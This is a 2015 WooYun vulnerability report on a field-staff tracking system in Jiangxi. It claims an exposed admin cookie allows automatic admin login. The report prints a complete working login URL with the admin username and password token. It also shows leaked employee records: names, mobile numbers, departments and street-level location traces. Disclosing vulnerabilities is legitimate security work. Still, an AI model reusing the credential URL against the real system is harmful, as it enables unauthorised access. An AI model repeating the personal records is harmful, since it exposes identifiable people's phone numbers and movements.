当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158900

漏洞标题:智慧南昌某外勤助手系统 HttpOnly漏洞导致管理员密码泄漏(引发大量用户敏感信息泄露)

相关厂商:江西门户

漏洞作者: 0x 80

提交时间:2015-12-07 11:07

修复时间:2016-01-21 11:10

公开时间:2016-01-21 11:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

智慧南昌某外勤助手系统 HttpOnly漏洞导致管理员密码泄漏(引发大量用户敏感信息泄露)

详细说明:

http://wq.jx163.com/
由于管理员的cookie加密数据被获取到
http://wq.jx163.com/loginSSO.action?username=ztjxadmin&password=5D3EA3110DFC1783&url=/WEB-INF/jsp/main.jsp&reloginUrl=/WEB-INF/jsp/login.jsp
自动覆盖登陆

QQ截图20151206173234.jpg


QQ截图20151206174637.jpg


邹建平 	18979516076 	服务部 	江西省九江市浔阳区滨兴街道滨江西路偏西北38... 	0 	2015-12-06 17:32:41 	轨迹列表 	地图轨迹
陈练 	18979517863 	服务部 	江西省宜春市袁州区油茶林场环城南路偏西142... 	0 	2015-12-06 17:32:41 	轨迹列表 	地图轨迹
辛俊斌 	18979518984 	江西区域. 	江西省宜春市万载县康乐街道沿河东路偏东北44... 	0 	2015-12-06 17:32:40 	轨迹列表 	地图轨迹
张基尧 	18979517933 	广东区域 	广东省揭阳市榕城区榕东街道德发大路偏西北24... 	0 	2015-12-06 17:32:40 	轨迹列表 	地图轨迹
罗灿 	18979518934 	服务部 	江西省南昌市西湖区桃花镇商圈二路偏南88米(... 	0 	2015-12-06 17:32:40 	轨迹列表 	地图轨迹
周自生 	18979519585 	服务部 	湖北省武汉市武昌区首义路街街道千家街偏西22... 	0 	2015-12-06 17:32:40 	轨迹列表 	地图轨迹
李平 	18979519578 	服务部 	江西省南昌市西湖区桃花镇商圈二路偏西21米(... 	0 	2015-12-06 17:32:40 	轨迹列表 	地图轨迹
聂世冬 	18979518979 	服务部 	江西省宜春市袁州区珠泉街道环城南路偏西北36... 	0 	2015-12-06 17:32:40 	轨迹列表 	地图轨


QQ截图20151206175654.jpg


漏洞证明:

http://wq.jx163.com/loginSSO.action?username=ztjxadmin&password=5D3EA3110DFC1783&url=/WEB-INF/jsp/main.jsp&reloginUrl=/WEB-INF/jsp/login.jsp

修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评价